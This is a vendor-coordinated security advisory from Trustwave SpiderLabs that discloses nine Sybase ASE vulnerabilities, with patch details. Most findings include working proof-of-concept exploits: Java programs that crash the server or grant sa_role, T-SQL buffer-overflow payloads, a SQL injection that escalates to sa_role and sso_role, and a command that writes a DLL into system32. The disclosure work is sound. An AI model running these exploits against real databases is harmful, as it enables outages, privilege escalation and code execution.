Trustwave SpiderLabs Security Advisory TWSL2013-035: Multiple Vulnerabilities in Sybase Adaptive Server Enterprise Published: 01/03/13 Version: 1.0 Vendor: Sybase Product: Adaptive Server Enterprise (ASE) Product description: Relational database management system for UNIX, Linux, and Microsoft Windows platforms. Finding 1: Denial of service via the hacmpmsgxchg built-in procedure. Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6867 CWE: CWE-20 Affected versions: Sybase ASE 15.7 Any valid database user can cause denial of service via invocation of the hacmpmsgxchg built-in procedure with missing parameters: as a result the server process dies. Example: /* * Adjust credentials and target host information in the code * * Compile with: * javac SSN1893561.java * Run with (copy jconn4.jar to current directory from Sybase ASE installation): * java -cp jconn4.jar:. SSN1893561 */ import java.sql.*; import java.util.Properties; public class SSN1893561 { // Adjust this information private static String username = "DB_USER"; private static String password = "DB_PASSWORD"; private static String hostname = "192.168.1.1"; private static String rpc_name = "hacmpmsgxchg"; private static int ha_cmpgrantrevrole = 109; public static void main(String args[]) throws InstantiationException, ClassNotFoundException, IllegalAccessException, SQLException { Properties props = new Properties(); props.put("user", username); props.put("password", password); String url = "jdbc:sybase:Tds:" + hostname + ":5000"; Driver sybdriver = (Driver) Class.forName("com.sybase.jdbc4.jdbc.SybDriver").newInstance(); DriverManager.registerDriver(sybdriver); Connection conn = DriverManager.getConnection(url, props); CallableStatement callablestatement = conn.prepareCall((new StringBuilder()).append("{?=call $").append(rpc_name).append("(?, ?)}").toString()); byte[] message = new byte[2048]; for (int i = 0; i < message.length; i++) { message[i] = 0x41; } callablestatement.setBytes(2, message); callablestatement.setInt(3, ha_cmpgrantrevrole); callablestatement.executeUpdate(); System.out.println("Done."); } } Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Vendor Communication Timeline: 12/03/2012 - Vendor notification 12/04/2012 - Vendor response 09/10/2013 - Patch released by vendor References 1. http://www.sybase.com/detail?id=1099371 2. https://service.sap.com/sap/support/notes/1893561 Finding 2: Denial of service via the ssl_admin built-in function Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6862 CWE: CWE-20 Affected versions: Sybase ASE 15.0, 15.5 and 15.7 Any valid database user can supply an overly long argument to the ssl_admin built-in function thus causing denial of service condition: as a result the server process dies. Example: -- Denial of service via built-in function select ssl_admin(replicate('A', 80), 'a', '3', 0) Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Sybase ASE 15.5: apply ESD#5.3 Sybase ASE 15.0.3: apply ESD#4.3 Vendor Communication Timeline: 06/20/2012 - Vendor notification 06/26/2012 - Vendor response 09/10/2013 - Patch released by vendor References 1. http://www.sybase.com/detail?id=1099371 2. https://service.sap.com/sap/support/notes/1887342 Finding 3: File creation via the TRANSFER TABLE command Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6864 CWE: CWE-285 Affected versions: Sybase ASE 15.0.3 and later Any valid database user can create arbitrary files on the database server filesystem via the TRANSFER TABLE command. One possible scenario is to replace existing libraries and then trigger the server to load modified versions thus executing arbitrary code in the server's process context. Example: -- TRANSFER FILE command file creation/overwrite example use tempdb go create table mydlltable (val binary(10)) go insert into mydlltable values (0x00112233445566778899) go -- This creates evil.dll under %SystemRoot%\system32 on Windows 32-bit box transfer table mydlltable to 'evil.dll' for bcp go drop table mydlltable go Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Sybase ASE 15.5: apply ESD#5.3 Sybase ASE 15.0.3: apply ESD#4.3 Vendor Communication Timeline: 09/27/2012 - Vendor notification 09/27/2012 - Vendor response 09/10/2013 - Patch released by vendor References 1. http://www.sybase.com/detail?id=1099371 2. https://service.sap.com/sap/support/notes/1893556 Finding 4: Buffer overflow in the set_password built-in function Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6865 CWE: CWE-20 Affected versions: Sybase ASE 15.0.3 and later. Any valid database user can supply an overly long argument to the set_password built-in function thus causing stack-based buffer overflow. This may allow to execute arbitrary code in the server's process context. Example: -- set_password built-in function stack-based buffer overflow declare @pwd varbinary(8000) select @pwd = 0x43444546474800 + REPLICATE(0x41, 7000) select set_password('DB_PASSWORD', @pwd, null) select set_password(@pwd, 'DB_PASSWORD', null) go Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Sybase ASE 15.5: apply ESD#5.3 Sybase ASE 15.0.3: apply ESD#4.3 Vendor Communication Timeline: 02/21/2013 - Vendor notification 02/22/2013 - Vendor response 09/10/2013 - Patch released by vendor References 1. http://www.sybase.com/detail?id=1099371 2. https://service.sap.com/sap/support/notes/1893558 Finding 5: Privilege elevation via SQL injection in the UPDATE STATISTICS command Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6863 CWE: CWE-89 Affected versions: Sybase ASE 15.0.3 and later. Any valid database user can elevate privileges via specially crafted UPDATE STATISTICS command. The command is vulnerable to SQL injection attack: it allows users to execute SQL code with the highest privileges possible. Example: -- SQL injection via the UPDATE STATISTICS command -- Grants sa_role, sso_role server roles to login 'DB_USER' -- Prerequisite: sp_configure 'max parallel degree', 8 use tempdb go create table [sysobjects grant role sa_role, sso_role to DB_USER--](id int) go alter table [sysobjects grant role sa_role, sso_role to DB_USER--] partition 2 go update statistics [sysobjects grant role sa_role, sso_role to DB_USER--] with sampling = 10 percent, calibrate = 1 go Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Sybase ASE 15.5: apply ESD#5.3 Sybase ASE 15.0.3: apply ESD#4.3 Vendor Communication Timeline: 06/02/2013 - Vendor notification 06/02/2013 - Vendor response 09/10/2013 - Patch released by vendor References http://www.sybase.com/detail?id=1099371 https://service.sap.com/sap/support/notes/1893440 Finding 6: Privilege elevation by any valid database user invocation of the hacmpmsgxchg built-in procedure Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6859 CWE: CWE-285 Affected versions: Sybase ASE 15.0, 15.5 and 15.7 Any valid user can grant himself or any other user 'sa_role' fixed server role via the hacmpmsgxchg built-in procedure invocation. Example: /* * Adjust credentials, target host information and suid in the code * * Compile with: * javac SSN1849356.java * Run with (copy jconn4.jar to current directory from Sybase ASE installation): * java -cp jconn4.jar:. SSN1849356 * * Examine the login roles after with sp_displaylogin */ import java.sql.*; import java.util.Properties; public class SSN1849356 { // Adjust this information private static String username = "DB_USER"; private static String password = "DB_PASSWORD"; private static String hostname = "192.168.1.1"; private static byte suid = 8; private static String rpc_name = "hacmpmsgxchg"; private static int ha_cmpgrantrevrole = 109; public static void main(String args[]) throws InstantiationException, ClassNotFoundException, IllegalAccessException, SQLException { Properties props = new Properties(); props.put("user", username); props.put("password", password); String url = "jdbc:sybase:Tds:" + hostname + ":5000"; Driver sybdriver = (Driver) Class.forName("com.sybase.jdbc4.jdbc.SybDriver").newInstance(); DriverManager.registerDriver(sybdriver); Connection conn = DriverManager.getConnection(url, props); CallableStatement callablestatement = conn.prepareCall((new StringBuilder()).append("{?=call $").append(rpc_name).append("(?, ?)}").toString()); byte[] message = new byte[150]; message[80] = 0x09; message[81] = 0x00; message[82] = 0x00; message[83] = 0x00; message[88] = 0x00; //role_id: zero means 'sa_role' message[88] = 0x00; message[88] = 0x00; message[88] = 0x00; message[136] = 0x01; message[137] = 0x00; message[138] = 0x00; message[139] = 0x00; message[140] = suid; //suid to grant server role to message[141] = 0x00; message[142] = 0x00; message[143] = 0x00; callablestatement.setBytes(2, message); callablestatement.setInt(3, ha_cmpgrantrevrole); callablestatement.executeUpdate(); System.out.println("Done."); } } Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Sybase ASE 15.5: apply ESD#5.3 Sybase ASE 15.0.3: apply ESD#4.3 Vendor Communication Timeline: 01/23/2012 - Vendor notification 02/21/2012 - Vendor response 09/10/2013 - Patch released by vendor References 1. http://www.sybase.com/detail?id=1099371 2. https://service.sap.com/sap/support/notes/1849356 Finding 7: Information disclosure through installation log files on Windows platforms Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6861 CWE: CWE-200 Affected versions: Sybase ASE 15.0.3 and later Installation log files contain cleartext password used for built-in 'sa' account during installation or upgrade of the server. On Windows platform the log files are publicly readable. Example: After the initial SAP Sybase ASE 15.7 installation, examine the log files under %SYBASE%\ASE-15_0\init\logs\ (publicly readable on Windows platforms): the Job Scheduler configuration step log file contains the initial 'sa' password. The following can be found in the log file: 12/05/12 01:08:42 PM SQL command: if not exists(select name from master.dbo.syslogins where name = 'sa') begin exec sp_addlogin sa, 'DB_PASSWORD' exec sp_adduser sa, sa end 12/05/12 01:08:42 PM SQL command: exec sp_role 'grant', sa_role, sa exec sp_role 'grant', js_admin_role, sa Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Sybase ASE 15.5: apply ESD#5.3 Sybase ASE 15.0.3: apply ESD#4.3 Vendor Communication Timeline: 12/05/2012 - Vendor notification 12/06/2012 - Vendor response 09/10/2013 - Patch released by vendor References http://www.sybase.com/detail?id=1099371 https://service.sap.com/sap/support/notes/1809246 Finding 8: Buffer overflow in the config_admin built-in function Credit: Vladimir Zakharevich of Trustwave (formerly Application Security Inc) CVE: CVE-2013-6245 CWE: CWE-20 Affected versions: Sybase ASE 15.0, 15.5 and 15.7 One of the SAP Sybase ASE built-in functions fails to validate input, resulting in a buffer overflow condition allowing to execute arbitrary code by any valid database user in the server's process context. Example: declare @cch varbinary(16380) select @cch = 0x4141414144444400 + REPLICATE('A', 268) + 0x55565758 + REPLICATE('B', 10) + 0x00000000000000000000 + 0x1300 + REPLICATE('C', 16042) select config_admin(28, 1,0, 0, NULL, @cch) go Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: No workarounds are currently available. Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP100 Sybase ASE 15.7: apply SP50 Sybase ASE 15.5: apply ESD#5.3 Sybase ASE 15.0.3: apply ESD#4.3 Vendor Communication Timeline: 03/25/2013 - Vendor notification 04/01/2013 - Vendor response 09/10/2013 - Patch released by vendor References http://www.sybase.com/detail?id=1099371 https://service.sap.com/sap/support/notes/1893560 Finding 9: Unauthenticated remote backup vulnerability Credit: Martin Rakhmanov of Trustwave (formerly Application Security Inc) CVE: CVE-2013-7245 CWE: CWE-285 Versions of Sybase ASE 15.7 prior to SP51 allow unauthenticated users perform remote backup operations and thus gain access to the database. The backup Server does not validate credentials of the backup command requestor. In SP51 for Sybase ASE 15.7 SAP introduced IP address validation to limit vulnerability exposure. Example: Attacker adds an entry to his interfaces file to point to a remote backup server and issues the BACKUP command with UNC path as destination. Provided that the target Sybase ASE can access the UNC location, the database backup will be stored on location of attacker's choice. No permissions are checked for that. Vendor Status: Vendor was contacted and a patch was released. Remediation Steps: Apply one of these following vendor supplied patches: Sybase ASE 15.7: apply SP51 As a workaround, the firewall should protect the backup server port from remote connections. Vendor Communication Timeline: 03/25/2013 - Vendor notification 03/27/2013 - Vendor response 12/13/2013 - Patch released by vendor References https://service.sap.com/sap/support/notes/1927859 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.